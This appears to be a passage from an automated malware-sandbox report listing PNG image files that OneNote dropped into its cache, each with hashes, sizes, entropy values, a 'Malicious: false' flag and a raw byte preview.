SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
